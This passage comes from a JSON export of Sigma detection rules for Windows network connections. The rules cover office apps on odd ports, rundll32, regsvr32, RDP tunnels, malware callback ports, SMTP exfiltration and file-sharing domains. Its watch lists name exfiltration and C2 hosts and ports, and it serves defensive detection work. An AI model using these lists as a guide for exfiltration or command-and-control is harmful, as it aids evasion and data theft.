    "content": "title: Office Application Initiated Network Connection Over Uncommon Ports\nid: 3b5ba899-9842-4bc2-acc2-12308498bf42\nstatus: test\ndescription: Detects an office suite application (Word, Excel, PowerPoint, Outlook) communicating with target systems over uncommon ports.\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-12\nmodified: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\wordview.exe'\n    filter_main_common_ports:\n        DestinationPort:\n            - 53 # DNS\n            - 80 # HTTP\n            - 139 # NETBIOS\n            - 389 # LDAP\n            - 443 # HTTPS\n            - 445 # SMB\n            - 3268 # MSFT-GC\n    filter_main_outlook_ports:\n        Image|contains: ':\\Program Files\\Microsoft Office\\'\n        Image|endswith: '\\OUTLOOK.EXE'\n        DestinationPort:\n            - 143 # IMAP\n            - 465 # SMTP\n            - 587 # SMTP\n            - 993 # IMAP\n            - 995 # POP3\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Other ports can be used, apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_python.yml",
    "content": "title: Python Initiated Connection\nid: bef0bc5a-b9ae-425d-85c6-7b2d705980c6\nstatus: test\ndescription: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python\n    - https://pypi.org/project/scapy/\nauthor: frack113\ndate: 2021-12-10\nmodified: 2025-03-05\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: network_connection\n    product: windows\n    definition: 'Requirements: Field enrichment is required for the filters to work. As fields such as CommandLine and ParentImage are not available by default on this event type'\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|contains|all:\n            - '\\python'\n            - '.exe'\n    filter_optional_conda:\n        # Related to anaconda updates. Command example: \"conda update conda\"\n        # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage\n        ParentImage: C:\\ProgramData\\Anaconda3\\Scripts\\conda.exe\n        CommandLine|contains|all:\n            - ':\\ProgramData\\Anaconda3\\Scripts\\conda-script.py'\n            - 'update'\n    filter_optional_conda_jupyter_notebook:\n        # Related to anaconda opening an instance of Jupyter Notebook\n        # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage\n        ParentImage: C:\\ProgramData\\Anaconda3\\python.exe\n        CommandLine|contains: 'C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py'\n    filter_main_local_communication:\n        # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python opening sockets locally etc. So comment this out if you want to monitor for those instances\n        DestinationIp: 127.0.0.1\n        SourceIp: 127.0.0.1\n    filter_main_pip:\n        CommandLine|contains|all:\n            - 'pip.exe'\n            - 'install'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml",
    "content": "title: Outbound RDP Connections Over Non-Standard Tools\nid: ed74fe75-7594-4b4b-ae38-e38e3fd2eb23\nstatus: test\ndescription: |\n    Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.\n    An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.\nreferences:\n    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\nauthor: Markus Neis\ndate: 2019-05-15\nmodified: 2024-02-09\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort: 3389\n        Initiated: 'true'\n    filter_main_mstsc:\n        Image:\n            - 'C:\\Windows\\System32\\mstsc.exe'\n            - 'C:\\Windows\\SysWOW64\\mstsc.exe'\n    filter_optional_dns:\n        # Note: https://github.com/SigmaHQ/sigma/pull/2249\n        Image: 'C:\\Windows\\System32\\dns.exe'\n        SourcePort: 53\n        Protocol: 'udp'\n    filter_optional_avast:\n        Image|endswith:\n            - '\\Avast Software\\Avast\\AvastSvc.exe'\n            - '\\Avast\\AvastSvc.exe'\n    filter_optional_sysinternals_rdcman:\n        Image|endswith: '\\RDCMan.exe'\n    filter_optional_chrome:\n        Image: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_third_party:\n        Image|endswith:\n            - '\\FSAssessment.exe'\n            - '\\FSDiscovery.exe'\n            - '\\MobaRTE.exe'\n            - '\\mRemote.exe'\n            - '\\mRemoteNG.exe'\n            - '\\Passwordstate.exe'\n            - '\\RemoteDesktopManager.exe'\n            - '\\RemoteDesktopManager64.exe'\n            - '\\RemoteDesktopManagerFree.exe'\n            - '\\RSSensor.exe'\n            - '\\RTS2App.exe'\n            - '\\RTSApp.exe'\n            - '\\spiceworks-finder.exe'\n            - '\\Terminals.exe'\n            - '\\ws_TunnelService.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_splunk:\n        Image|startswith: 'C:\\Program Files\\SplunkUniversalForwarder\\bin\\'\n    filter_optional_sentinel_one:\n        Image|endswith: '\\Ranger\\SentinelRanger.exe'\n    filter_optional_firefox:\n        Image: 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_tsplus:  # Some RAS\n        Image:\n            - 'C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe'\n            - 'C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe'\n    filter_optional_null:\n        Image: null\n    filter_optional_empty:\n        Image: ''\n    filter_optional_unknown:\n        Image: '<unknown process>'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Third party RDP tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml",
    "content": "title: RDP Over Reverse SSH Tunnel\nid: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4\nstatus: test\ndescription: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389\nreferences:\n    - https://twitter.com/cyb3rops/status/1096842275437625346\nauthor: Samir Bousseaden\ndate: 2019-02-16\nmodified: 2024-03-12\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.lateral-movement\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\svchost.exe'\n        Initiated: 'true'\n        SourcePort: 3389\n    selection_destination:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '::1/128'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rdp_to_http.yml",
    "content": "title: RDP to HTTP or HTTPS Target Ports\nid: b1e5da3b-ca8e-4adf-915c-9921f3d85481\nstatus: test\ndescription: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443\nreferences:\n    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg\n    - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-29\nmodified: 2022-07-14\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.lateral-movement\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        Initiated: 'true'\n        SourcePort: 3389\n        DestinationPort:\n            - 80\n            - 443\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_regasm_network_activity.yml",
    "content": "title: RegAsm.EXE Initiating Network Connection To Public IP\nid: 0531e43a-d77d-47c2-b89f-5fe50321c805\nstatus: test\ndescription: Detects \"RegAsm.exe\" initiating a network connection to public IP addresses\nreferences:\n    - https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/\n    - https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/\n    - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\nauthor: frack113\ndate: 2024-04-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\regasm.exe'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml",
    "content": "title: Network Connection Initiated By Regsvr32.EXE\nid: c7e91a02-d771-4a6d-a700-42587e0b1095\nstatus: test\ndescription: Detects a network connection initiated by \"Regsvr32.exe\"\nreferences:\n    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\n    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\nauthor: Dmitriy Lifanov, oscd.community\ndate: 2019-10-25\nmodified: 2023-09-18\ntags:\n    - attack.execution\n    - attack.t1559.001\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\regsvr32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml",
    "content": "title: Remote Access Tool - AnyDesk Incoming Connection\nid: d58ba5c6-0ed7-4b9d-a433-6878379efda9\nstatus: experimental\ndescription: |\n    Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\n    - https://asec.ahnlab.com/en/40263/\nauthor: '@d4ns4n_ (Wuerth-Phoenix)'\ndate: 2024-09-02\nmodified: 2025-02-24\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\AnyDesk.exe'\n            - '\\AnyDeskMSI.exe'\n        Initiated: 'false' # If the network connection is initiated remotely (incoming), the field is set to false.\n    condition: selection\nfalsepositives:\n    - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally).\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml",
    "content": "title: Rundll32 Internet Connection\nid: cdc8da7d-c303-42f8-b08c-b4ab47230263\nstatus: test\ndescription: Detects a rundll32 that communicates with public IP addresses\nreferences:\n    - https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-04\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.execution\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_ms_ranges:\n        DestinationIp|cidr:\n            - '20.0.0.0/8' # Microsoft range, caused some FPs\n            - '51.103.0.0/16' # Microsoft AS8075 range, caused some FPs\n            - '51.104.0.0/16' # Microsoft AS8075 range, caused some FPs\n            - '51.105.0.0/16' # Microsoft AS8075 range, caused some FPs\n    filter_main_app_sdb:\n        CommandLine|endswith: '\\system32\\PcaSvc.dll,PcaPatchSdbTask'\n    filter_main_azure_managed:\n        SourceHostname|endswith: '.internal.cloudapp.net'\n    filter_main_svchost_update_processes:\n        # Note: This requires \"ParentImage\" data enrichment.\n        ParentImage: 'C:\\Windows\\System32\\svchost.exe'\n        DestinationPort: 443\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml",
    "content": "title: Silenttrinity Stager Msbuild Activity\nid: 50e54b8d-ad73-43f8-96a1-5191685b17a4\nstatus: test\ndescription: Detects possible remote connections to a Silenttrinity C2\nreferences:\n    - https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/\nauthor: Kiran kumar s, oscd.community\ndate: 2020-10-11\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1127.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msbuild.exe'\n    filter:\n        DestinationPort:\n            - 80\n            - 443\n        Initiated: 'true'\n    condition: selection and filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml",
    "content": "title: Suspicious Network Connection Binary No CommandLine\nid: 20384606-a124-4fec-acbb-8bd373728613\nstatus: test\ndescription: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\dllhost.exe'\n        CommandLine|endswith:\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\dllhost.exe'\n    filter_no_cmdline:\n        CommandLine: ''\n    filter_null: # e.g. Sysmon has no CommandLine field in network events with ID 3\n        CommandLine: null\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml",
    "content": "title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder\nid: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97\nrelated:\n    - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153\n      type: obsolete\nstatus: test\ndescription: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.\nreferences:\n    - https://twitter.com/M_haggis/status/900741347035889665\n    - https://twitter.com/M_haggis/status/1032799638213066752\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-08-30\nmodified: 2025-12-10\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection_paths:\n        Image|contains:\n            - ':\\$Recycle.bin'\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Fonts\\'\n            - ':\\Windows\\IME\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Temp\\'\n            - '\\config\\systemprofile\\'\n            - '\\Windows\\addins\\'\n    selection_domains:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.co.nz'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml",
    "content": "title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location\nid: 7b434893-c57d-4f41-908d-6a17bf1ae98f\nstatus: test\ndescription: |\n    Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-03-19\nmodified: 2025-12-10\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|contains:\n            - ':\\$Recycle.bin'\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Fonts\\'\n            - ':\\Windows\\IME\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - '\\config\\systemprofile\\'\n            - '\\Contacts\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Videos\\'\n            - '\\Windows\\addins\\'\n    filter_main_domains:\n        # Note: We exclude these domains to avoid duplicate filtering from e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97\n        DestinationHostname|endswith:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.co.nz'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'portmap.io'  # https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml",
    "content": "title: Potentially Suspicious Malware Callback Communication\nid: 4b89abaa-99fe-4232-afdd-8f9aa4d20382\nrelated:\n    - id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c\n      type: similar\nstatus: test\ndescription: |\n    Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2024-03-12\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationPort:\n            - 100\n            - 198\n            - 200\n            - 243\n            - 473\n            - 666\n            - 700\n            - 743\n            - 777\n            - 1443\n            - 1515\n            - 1777\n            - 1817\n            - 1904\n            - 1960\n            - 2443\n            - 2448\n            - 3360\n            - 3675\n            - 3939\n            - 4040\n            - 4433\n            - 4438\n            - 4443\n            - 4444\n            - 4455\n            - 5445\n            - 5552\n            - 5649\n            - 6625\n            - 7210\n            - 7777\n            - 8143\n            - 8843\n            - 9631\n            - 9943\n            - 10101\n            - 12102\n            - 12103\n            - 12322\n            - 13145\n            - 13394\n            - 13504\n            - 13505\n            - 13506\n            - 13507\n            - 14102\n            - 14103\n            - 14154\n            - 49180\n            - 65520\n            - 65535\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_optional_sys_directories:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml",
    "content": "title: Communication To Uncommon Destination Ports\nid: 6d8c3d20-a5e1-494f-8412-4571d716cf5c\nrelated:\n    - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382\n      type: similar\nstatus: test\ndescription: Detects programs that connect to uncommon destination ports\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2024-03-12\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationPort:\n            - 8080\n            - 8888\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_optional_sys_directories:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml",
    "content": "title: Uncommon Outbound Kerberos Connection\nid: e54979bd-c5f9-4d6c-967b-a04b19ac4c74\nrelated:\n    - id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350\n      type: similar\nstatus: test\ndescription: |\n    Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\nreferences:\n    - https://github.com/GhostPack/Rubeus\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-24\nmodified: 2024-03-15\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1558\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort: 88\n        Initiated: 'true'\n    filter_main_lsass:\n        Image: 'C:\\Windows\\System32\\lsass.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_tomcat:\n        Image|endswith: '\\tomcat\\bin\\tomcat8.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Web browsers and third-party applications might generate similar activity. An initial baseline is required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml",
    "content": "title: Microsoft Sync Center Suspicious Network Connections\nid: 9f2cc74d-78af-4eb2-bb64-9cd1d292b87b\nstatus: test\ndescription: Detects suspicious connections from Microsoft Sync Center to non-private IPs.\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim\ndate: 2022-04-28\nmodified: 2024-03-12\ntags:\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.t1218\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        Image|endswith: '\\mobsync.exe'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml",
    "content": "title: Suspicious Outbound SMTP Connections\nid: 9976fa64-2804-423c-8a5b-646ade840773\nstatus: test\ndescription: |\n    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\n    The data may also be sent to an alternate network location from the main command and control server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp\n    - https://www.ietf.org/rfc/rfc2821.txt\nauthor: frack113\ndate: 2022-01-07\nmodified: 2022-09-21\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort:\n            - 25\n            - 587\n            - 465\n            - 2525\n        Initiated: 'true'\n    filter_clients:\n        Image|endswith:\n            - \\thunderbird.exe\n            - \\outlook.exe\n    filter_mailserver:\n        Image|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n    filter_outlook:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_'\n        Image|endswith: '\\HxTsr.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Other SMTP tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml",
    "content": "title: Potential Remote PowerShell Session Initiated\nid: c539afac-c12a-46ed-b1bd-5a5567c9f045\nstatus: test\ndescription: |\n    Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.\n    This could potentially indicate a remote PowerShell connection.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2024-02-02\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort:\n            - 5985\n            - 5986\n        Initiated: 'true' # only matches of the initiating system can be evaluated\n        SourceIsIpv6: 'false'\n    filter_main_service_users:\n        - User|contains: # covers many language settings for Network Service. Please expand\n              - 'NETWORK SERVICE'\n              - 'NETZWERKDIENST'\n              - 'SERVICIO DE RED'\n              - 'SERVIZIO DI RETE'\n        - User|contains|all:\n              - 'SERVICE R'\n              - 'SEAU'\n    filter_main_localhost:\n        SourceIp:\n            - '::1'\n            - '127.0.0.1'\n        DestinationIp:\n            - '::1'\n            - '127.0.0.1'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\AvastSvc.exe'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\AvastSvc.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.\n    - Network Service user name of a not-covered localization\nlevel: high\n"
  },
